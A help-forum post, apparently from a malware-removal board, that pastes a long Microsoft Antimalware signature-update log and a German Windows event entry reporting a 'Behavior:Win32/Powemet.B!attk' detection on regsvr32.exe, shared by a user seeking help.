                                    Directory: C:\Windows\Temp\4ADCA1A7-5C97-4F48-8D10-816B26127B56958.1d315e69b47cf76
 1.249.1026.0_to_1.249.1076.0_mpasdlta.vdm._p: 54c0a343a211eb4663aa88c75e66a4af6f987bd76b8e955a2a033f6132e7b88f      
 1.249.1026.0_to_1.249.1076.0_mpavdlta.vdm._p: e06c1467d9498c60869250f22c164468b6b3aea7c2c3bccab12bc1223f5df884      
                                 mpasdlta.vdm: 3a443cde90a8a424fd9335755fb241732887e4db994de637c46e04baccea9934         1.249.1076.0
                                 mpavdlta.vdm: 3644f5a4310528b9efc5cc5e13fc9fc6d950c8816625d94d4fc5540081971bf1         1.249.1076.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{112C76F6-371F-4C57-9EF3-6AD5264E5F3C} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{53B79BC9-2E9B-4FBA-AC6D-E808908C080E}
Signatures updated from C:\Windows\Temp\4ADCA1A7-5C97-4F48-8D10-816B26127B56958.1d315e69b47cf76

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:     Updated to:
 AS delta VDM: 1.249.1026.0  1.249.1076.0
 AV delta VDM: 1.249.1026.0  1.249.1076.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-15 16:50:52Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-16 15:21:17Z
Process: 12e0.1d316a34e69aa28
Command: /stub 1.1.13850.0 /payload 1.249.1077.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1076.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.1076.0                       
 AV delta VDM: 1.249.1076.0                       
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1076.0.exe

=============================== PackageDiscovery ===============================

                     Package files discovered:
                                    Directory: C:\Windows\Temp\12DD9C03-77D2-4798-8B89-F44672049BED12e0.1d316a34e69aa28
 1.249.1076.0_to_1.249.1077.0_mpasdlta.vdm._p: 9d2cd18bdb48a68deb2e2a0799fec3d5b2e94facad4a2b02e1adda93e039b9cb       
 1.249.1076.0_to_1.249.1077.0_mpavdlta.vdm._p: 864dd0c84507448f554508176f3e0634c2d0dd2dcda3e0cf536078600ee670d0       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1077.0
 AV delta VDM: 1.249.1077.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1077.0
Patched mpavdlta.vdm to 1.249.1077.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                Package files:
                                    Directory: C:\Windows\Temp\12DD9C03-77D2-4798-8B89-F44672049BED12e0.1d316a34e69aa28
 1.249.1076.0_to_1.249.1077.0_mpasdlta.vdm._p: 9d2cd18bdb48a68deb2e2a0799fec3d5b2e94facad4a2b02e1adda93e039b9cb       
 1.249.1076.0_to_1.249.1077.0_mpavdlta.vdm._p: 864dd0c84507448f554508176f3e0634c2d0dd2dcda3e0cf536078600ee670d0       
                                 mpasdlta.vdm: 3a3f54fd7af77868c3903904cd02e38884361550465f186582c221a8e6afa694          1.249.1077.0
                                 mpavdlta.vdm: 02e8abf1d6da287badec5a83c50b16d534a1f3cfb5f53eaa062e7df0c5f60600          1.249.1077.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{53B79BC9-2E9B-4FBA-AC6D-E808908C080E} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{EC18EAC3-B138-4D56-A73C-9EF1AB7F585D}
Signatures updated from C:\Windows\Temp\12DD9C03-77D2-4798-8B89-F44672049BED12e0.1d316a34e69aa28

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:     Updated to:
 AS delta VDM: 1.249.1076.0  1.249.1077.0
 AV delta VDM: 1.249.1076.0  1.249.1077.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-16 15:24:08Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-17 15:28:16Z
Process: 11f4.1d3176d7255da20
Command: /stub 1.1.13850.0 /payload 1.249.1169.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1077.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.13850.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.1077.0                       
 AV delta VDM: 1.249.1077.0                       
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1077.0.exe

=============================== PackageDiscovery ===============================

                     Package files discovered:
                                    Directory: C:\Windows\Temp\D9969291-1EF5-4F30-9A1C-3B6B4AE253DE11f4.1d3176d7255da20
 1.249.1077.0_to_1.249.1169.0_mpasdlta.vdm._p: 4def8d866902e5ee749e6ae044092619130f8f6678156f5872658148aff1085a       
 1.249.1077.0_to_1.249.1169.0_mpavdlta.vdm._p: ce358fdeab94166e2da07fdca3504078ea61d8be9f0bcd6c32273f971dc295f4       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1169.0
 AV delta VDM: 1.249.1169.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1169.0
Patched mpavdlta.vdm to 1.249.1169.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                Package files:
                                    Directory: C:\Windows\Temp\D9969291-1EF5-4F30-9A1C-3B6B4AE253DE11f4.1d3176d7255da20
 1.249.1077.0_to_1.249.1169.0_mpasdlta.vdm._p: 4def8d866902e5ee749e6ae044092619130f8f6678156f5872658148aff1085a       
 1.249.1077.0_to_1.249.1169.0_mpavdlta.vdm._p: ce358fdeab94166e2da07fdca3504078ea61d8be9f0bcd6c32273f971dc295f4       
                                 mpasdlta.vdm: ed9b54113ce4253f38cf668c61dbced9dc6b331fce734d9dfb469724aa2157b5          1.249.1169.0
                                 mpavdlta.vdm: 2332ea51d9bcd94e06197163af44aa606df1db21cb527ed8df10d382ca1a149d          1.249.1169.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{EC18EAC3-B138-4D56-A73C-9EF1AB7F585D} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{67CCBCC3-5B29-42F0-97C4-D68BA280597A}
Signatures updated from C:\Windows\Temp\D9969291-1EF5-4F30-9A1C-3B6B4AE253DE11f4.1d3176d7255da20

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:     Updated to:
 AS delta VDM: 1.249.1077.0  1.249.1169.0
 AV delta VDM: 1.249.1077.0  1.249.1169.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-17 15:28:47Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-18 15:37:47Z
Process: 500.1d31837f1485076
Command: /Store
Administrator: yes
Version: 1.1.14146.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-18 15:37:47Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-18 15:37:48Z
Process: 230.1d31837f1bcf3e4
Command: /stub 1.1.14146.0 /payload 1.249.1204.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1169.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.14146.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.1169.0                       
 AV delta VDM: 1.249.1169.0                       
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1169.0.exe

=============================== PackageDiscovery ===============================

                     Package files discovered:
                                    Directory: C:\Windows\Temp\40E576B6-5574-40E6-83DD-030DB04FCC9C230.1d31837f1bcf3e4
 1.249.1169.0_to_1.249.1204.0_mpasdlta.vdm._p: 527038c1e5d3390bcb7c4da62d4fcf094a50aa6ed41f274e473841f1db17234e      
 1.249.1169.0_to_1.249.1204.0_mpavdlta.vdm._p: 107437aee7d282b95d6e77f9e61484b483edbbac0f674fdee43f7fbea42ae951      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1204.0
 AV delta VDM: 1.249.1204.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1204.0
Patched mpavdlta.vdm to 1.249.1204.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                Package files:
                                    Directory: C:\Windows\Temp\40E576B6-5574-40E6-83DD-030DB04FCC9C230.1d31837f1bcf3e4
 1.249.1169.0_to_1.249.1204.0_mpasdlta.vdm._p: 527038c1e5d3390bcb7c4da62d4fcf094a50aa6ed41f274e473841f1db17234e      
 1.249.1169.0_to_1.249.1204.0_mpavdlta.vdm._p: 107437aee7d282b95d6e77f9e61484b483edbbac0f674fdee43f7fbea42ae951      
                                 mpasdlta.vdm: 59c3a20f638c38a5c3242d3a9bad23b11b6fc15c2a7990e670b769650244611d         1.249.1204.0
                                 mpavdlta.vdm: 3276ccae9e081023e0ee96371923327eb3cb0f6ad2902da11255f0cda0be6aab         1.249.1204.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{67CCBCC3-5B29-42F0-97C4-D68BA280597A} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{7E327525-6B68-4C69-89DC-B64498A8E93B}
Signatures updated from C:\Windows\Temp\40E576B6-5574-40E6-83DD-030DB04FCC9C230.1d31837f1bcf3e4

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:     Updated to:
 AS delta VDM: 1.249.1169.0  1.249.1204.0
 AV delta VDM: 1.249.1169.0  1.249.1204.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-18 15:38:58Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-18 15:54:29Z
Process: 139c.1d3183a46ba911c
Command: /Store
Administrator: yes
Version: 1.1.13850.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-18 15:54:33Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-19 15:33:58Z
Process: 534.1d319009334499f
Command: /Store
Administrator: yes
Version: 1.1.14146.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-19 15:34:00Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-19 15:34:01Z
Process: 1324.1d3190094c72485
Command: /stub 1.1.14146.0 /payload 1.249.1265.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1204.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.14146.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.1204.0                       
 AV delta VDM: 1.249.1204.0                       
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1204.0.exe

=============================== PackageDiscovery ===============================

                     Package files discovered:
                                    Directory: C:\Windows\Temp\F264A8B3-B44E-40C1-8CD9-F0CBDC735AD41324.1d3190094c72485
 1.249.1204.0_to_1.249.1265.0_mpasdlta.vdm._p: 2ccdd8750fc6fc1939c312ec5482a6f381f942348e5a010d562b2d5537519653       
 1.249.1204.0_to_1.249.1265.0_mpavdlta.vdm._p: f6a199aaeb5e1730c314c26de787711925acda5d119c0f96ffbffdb06fd8afe2       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1265.0
 AV delta VDM: 1.249.1265.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1265.0
Patched mpavdlta.vdm to 1.249.1265.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                Package files:
                                    Directory: C:\Windows\Temp\F264A8B3-B44E-40C1-8CD9-F0CBDC735AD41324.1d3190094c72485
 1.249.1204.0_to_1.249.1265.0_mpasdlta.vdm._p: 2ccdd8750fc6fc1939c312ec5482a6f381f942348e5a010d562b2d5537519653       
 1.249.1204.0_to_1.249.1265.0_mpavdlta.vdm._p: f6a199aaeb5e1730c314c26de787711925acda5d119c0f96ffbffdb06fd8afe2       
                                 mpasdlta.vdm: 64f11ee2303fbdef1f7a0fc6eb968e46f5464f8eb0b97367c22d2999e0c19750          1.249.1265.0
                                 mpavdlta.vdm: 5a62b4525aa524b64c49738c65b7fe1b45d61a1b6c8633058c0b33feb6a52bb5          1.249.1265.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{7E327525-6B68-4C69-89DC-B64498A8E93B} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{D5E63696-CDCE-4088-8C3B-A066091B5294}
Signatures updated from C:\Windows\Temp\F264A8B3-B44E-40C1-8CD9-F0CBDC735AD41324.1d3190094c72485

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:     Updated to:
 AS delta VDM: 1.249.1204.0  1.249.1265.0
 AV delta VDM: 1.249.1204.0  1.249.1265.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-19 15:35:44Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-20 15:47:23Z
Process: 130c.1d319cb9d2c8be7
Command: /Store
Administrator: yes
Version: 1.1.13850.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-20 15:47:23Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-21 16:14:43Z
Process: 1270.1d31a9899988090
Command: /Store
Administrator: yes
Version: 1.1.14146.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-21 16:14:44Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-21 16:14:44Z
Process: 12a4.1d31a9899db2718
Command: /stub 1.1.14146.0 /payload 1.249.1318.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1283.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.14146.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.1283.0                       
 AV delta VDM: 1.249.1283.0                       
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1283.0.exe

=============================== PackageDiscovery ===============================

                     Package files discovered:
                                    Directory: C:\Windows\Temp\82948E96-4AB8-4D43-93DC-A25BBAFFFD3012a4.1d31a9899db2718
 1.249.1283.0_to_1.249.1318.0_mpasdlta.vdm._p: 30e2ff8c89e9d833b2123d65a1af6eeeb1dc101cb5d8d220b60fe009069cd165       
 1.249.1283.0_to_1.249.1318.0_mpavdlta.vdm._p: 3bfefa93fe475c1d4fbcd4c714ab1a85ab4dfc8d33a187c961674f7e9394960f       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1318.0
 AV delta VDM: 1.249.1318.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1318.0
Patched mpavdlta.vdm to 1.249.1318.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                Package files:
                                    Directory: C:\Windows\Temp\82948E96-4AB8-4D43-93DC-A25BBAFFFD3012a4.1d31a9899db2718
 1.249.1283.0_to_1.249.1318.0_mpasdlta.vdm._p: 30e2ff8c89e9d833b2123d65a1af6eeeb1dc101cb5d8d220b60fe009069cd165       
 1.249.1283.0_to_1.249.1318.0_mpavdlta.vdm._p: 3bfefa93fe475c1d4fbcd4c714ab1a85ab4dfc8d33a187c961674f7e9394960f       
                                 mpasdlta.vdm: 9c9f8c431c94c85d2a57d7dce94d2fe25a497480a0fa2838896ad605c8ec0cee          1.249.1318.0
                                 mpavdlta.vdm: 483b4a510914dc4f68d874ee44324d5d495fe6a0fd1f990a1dc08ee88cd0620f          1.249.1318.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{6CFFA316-2799-4D8C-8406-4604ACDE40A6} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{D9B34EC2-658A-4313-895A-3A38C8D2FF14}
Signatures updated from C:\Windows\Temp\82948E96-4AB8-4D43-93DC-A25BBAFFFD3012a4.1d31a9899db2718

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:     Updated to:
 AS delta VDM: 1.249.1283.0  1.249.1318.0
 AV delta VDM: 1.249.1283.0  1.249.1318.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-21 16:15:07Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-22 17:03:00Z
Process: 25c.1d31b6881f4bd79
Command: /Store
Administrator: yes
Version: 1.1.13850.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-22 17:03:00Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-23 16:20:49Z
Process: 11cc.1d31c2bc87103cb
Command: /Store
Administrator: yes
Version: 1.1.14146.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-23 16:20:49Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-23 16:20:50Z
Process: 1340.1d31c2bc8c31c9f
Command: /stub 1.1.14146.0 /payload 1.249.1403.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1361.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.14146.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14003.0                        
  AS base VDM: 1.249.0.0                          
  AV base VDM: 1.249.0.0                          
 AS delta VDM: 1.249.1361.0                       
 AV delta VDM: 1.249.1361.0                       
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.249.1361.0.exe

=============================== PackageDiscovery ===============================

                     Package files discovered:
                                    Directory: C:\Windows\Temp\D44DE398-B383-491E-B9AC-6A7992E5875E1340.1d31c2bc8c31c9f
 1.249.1361.0_to_1.249.1403.0_mpasdlta.vdm._p: de3c34ec5f620d5b512c2376c1a28cba19ea27c69673e9a8c429f9846db4bab4       
 1.249.1361.0_to_1.249.1403.0_mpavdlta.vdm._p: fe60977320aff21866c7753a52942db9a77832c0331959ec4203af89a8486f66       
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.249.1403.0
 AV delta VDM: 1.249.1403.0

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.249.1403.0
Patched mpavdlta.vdm to 1.249.1403.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                                Package files:
                                    Directory: C:\Windows\Temp\D44DE398-B383-491E-B9AC-6A7992E5875E1340.1d31c2bc8c31c9f
 1.249.1361.0_to_1.249.1403.0_mpasdlta.vdm._p: de3c34ec5f620d5b512c2376c1a28cba19ea27c69673e9a8c429f9846db4bab4       
 1.249.1361.0_to_1.249.1403.0_mpavdlta.vdm._p: fe60977320aff21866c7753a52942db9a77832c0331959ec4203af89a8486f66       
                                 mpasdlta.vdm: 8ffc40524a5de76890290460dbbbfa3046655c79d6317ac011b361766e44cbce          1.249.1403.0
                                 mpavdlta.vdm: e58d7a103b80dca336474e13af0a92590260e5321a1db067b99df426f62918fa          1.249.1403.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B69FC86B-1995-4CE4-B64F-670B2D652EBB} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B7A0C0A3-2D77-4336-BA8A-0EF0A4F7FA59}
Signatures updated from C:\Windows\Temp\D44DE398-B383-491E-B9AC-6A7992E5875E1340.1d31c2bc8c31c9f

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:     Updated to:
 AS delta VDM: 1.249.1361.0  1.249.1403.0
 AV delta VDM: 1.249.1361.0  1.249.1403.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-23 16:21:18Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-24 15:41:51Z
Process: 10a8.1d31cef815bcd43
Command: /Store
Administrator: yes
Version: 1.1.13850.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-24 15:41:51Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-25 15:53:24Z
Process: 1214.1d31dba48924e2b
Command: /Store
Administrator: yes
Version: 1.1.14146.0

================================ CacheMpSigStub ================================

Copied MpSigStub.exe to C:\Windows\system32\MpSigStub.exe
End time: 2017-08-25 15:53:24Z
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
Start time: 2017-08-25 15:53:24Z
Process: bc4.1d31dba48d9b773
Command: /stub 1.1.14146.0 /payload 1.251.70.0 /MpWUStub /program C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.251.32.0.exe ANTIMALWARE /q
Administrator: yes
Version: 1.1.14146.0

================================ ProductSearch =================================

               Microsoft Antimalware (Beijing):   
       Status: Active                             
  ProductGUID: EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
       Engine: 1.1.14104.0                        
  AS base VDM: 1.251.0.0                          
  AV base VDM: 1.251.0.0                          
 AS delta VDM: 1.251.32.0                         
 AV delta VDM: 1.251.32.0                         
   NIS engine: 2.1.13804.0                        
 NIS base VDM: 117.0.0.0                          
 NIS full VDM: 117.8.0.0                          
     Platform: 4.10.209.0                         

============================== AccumulatePackages ==============================

PackageName:*C:\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.251.32.0.exe

=============================== PackageDiscovery ===============================

                 Package files discovered:
                                Directory: C:\Windows\Temp\BDCCCD88-68F4-4B73-AC49-48A5AFFB4E14bc4.1d31dba48d9b773
 1.251.32.0_to_1.251.70.0_mpasdlta.vdm._p: 8b8a10708377245149202a5bfbe0518b711cb253834e2a805fad5f1ec29d4fa4      
 1.251.32.0_to_1.251.70.0_mpavdlta.vdm._p: f9bc3b872128fd0c57ffc39c3715cde594cc89b0b1ae10430079149e7135a75b      
               AM BDD:    
       Engine: Not included
  AS base VDM: Not included
  AV base VDM: Not included
 AS delta VDM: 1.251.70.0 
 AV delta VDM: 1.251.70.0 

=============================== PatchApplication ===============================

Patched mpasdlta.vdm to 1.251.70.0
Patched mpavdlta.vdm to 1.251.70.0

==================================== Update ====================================

 Product name: Microsoft Antimalware (Beijing)
                            Package files:
                                Directory: C:\Windows\Temp\BDCCCD88-68F4-4B73-AC49-48A5AFFB4E14bc4.1d31dba48d9b773
 1.251.32.0_to_1.251.70.0_mpasdlta.vdm._p: 8b8a10708377245149202a5bfbe0518b711cb253834e2a805fad5f1ec29d4fa4      
 1.251.32.0_to_1.251.70.0_mpavdlta.vdm._p: f9bc3b872128fd0c57ffc39c3715cde594cc89b0b1ae10430079149e7135a75b      
                             mpasdlta.vdm: 31358f05d46b755d23a691d98c6ae3c65eeeff4ac8e6943bece85ed7f5a7a95b         1.251.70.0
                             mpavdlta.vdm: 2894500990c7ddc7e58e7244a37235c9c5ef4911d22622b371fd855d97b1dde7         1.251.70.0
SignatureLocation changed from c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{80C2ED56-595B-4CBA-9FEA-AD931247262D} to c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{9665FF3E-5395-4B02-90F3-3D93190602DD}
Signatures updated from C:\Windows\Temp\BDCCCD88-68F4-4B73-AC49-48A5AFFB4E14bc4.1d31dba48d9b773

================================ ValidateUpdate ================================

MpSigStub successfully updated Microsoft Antimalware (Beijing) using the AM BDD package.

               Original:   Updated to:
 AS delta VDM: 1.251.32.0  1.251.70.0
 AV delta VDM: 1.251.32.0  1.251.70.0

DeltaUpdateFailure set to 0
BddUpdateFailure set to 0
End time: 2017-08-25 15:53:49Z
--------------------------------------------------------------------------------

 

 



 



#4 Schub

Schub
  • Topic Starter

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Local time:01:06 PM

Posted 25 August 2017 - 02:06 PM

Entry in System Log

 

Protokollname: System
Quelle:        Microsoft Antimalware
Datum:         25.08.2017 20:11:58
Ereignis-ID:   1116
Aufgabenkategorie:Keine
Ebene:         Warnung
Schlüsselwörter:Klassisch
Benutzer:      Nicht zutreffend
Computer:      Sandburg9
Beschreibung:
Von Microsoft-Antischadsoftware wurde Schadsoftware oder andere potenziell unerwünschte Software entdeckt.
 Weitere Informationen finden Sie hier:
http://go.microsoft.com/fwlink/?linkid=37020&name=Behavior:Win32/Powemet.B!attk&threatid=2147722898&enterprise=0
  Name: Behavior:Win32/Powemet.B!attk
  ID: 2147722898
  Schweregrad: Schwerwiegend
  Kategorie: Verdächtiges Verhalten
  Pfad: behavior:_pid:3476:94227975697806;process:_pid:3476,ProcessStart:131481583170419838
  Ursprung der Erkennung: Unbekannt
  Typ der Erkennung: Konkret
  Quelle der Erkennung: System
  Benutzer: NT-AUTORITÄT\SYSTEM
  Prozessname: C:\Windows\System32\regsvr32.exe
  Signaturversion: AV: 1.251.70.0, AS: 1.251.70.0, NIS: 117.8.0.0
  Modulversion: AM: 1.1.14104.0, NIS: 2.1.13804.0
Ereignis-XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft Antimalware" />
    <EventID Qualifiers="0">1116</EventID>
    <Level>3</Level>
    <Task>0</Task>
    <Keywords>0x80000000000000</Keywords>
    <TimeCreated SystemTime="2017-08-25T18:11:58.000000000Z" />
    <EventRecordID>1055848</EventRecordID>
    <Channel>System</Channel>
    <Computer>Sandburg9</Computer>
    <Security />
  </System>
  <EventData>
    <Data>%%860</Data>
    <Data>4.10.209.0</Data>
    <Data>{3069CDA0-6656-4258-8808-601BA135C90E}</Data>
    <Data>2017-08-25T18:11:57.351Z</Data>
    <Data>
    </Data>
    <Data>
    </Data>
    <Data>2147722898</Data>
    <Data>Behavior:Win32/Powemet.B!attk</Data>
    <Data>5</Data>
    <Data>Schwerwiegend</Data>
    <Data>46</Data>
    <Data>Verdächtiges Verhalten</Data>
    <Data>http://go.microsoft.com/fwlink/?linkid=37020&amp;name=Behavior:Win32/Powemet.B!attk&amp;threatid=2147722898&amp;enterprise=0</Data>
    <Data>1</Data>
    <Data>
    </Data>
    <Data>1</Data>
    <Data>2</Data>
    <Data>%%820</Data>
    <Data>C:\Windows\System32\regsvr32.exe</Data>
    <Data>NT-AUTORITÄT\SYSTEM</Data>
    <Data>
    </Data>
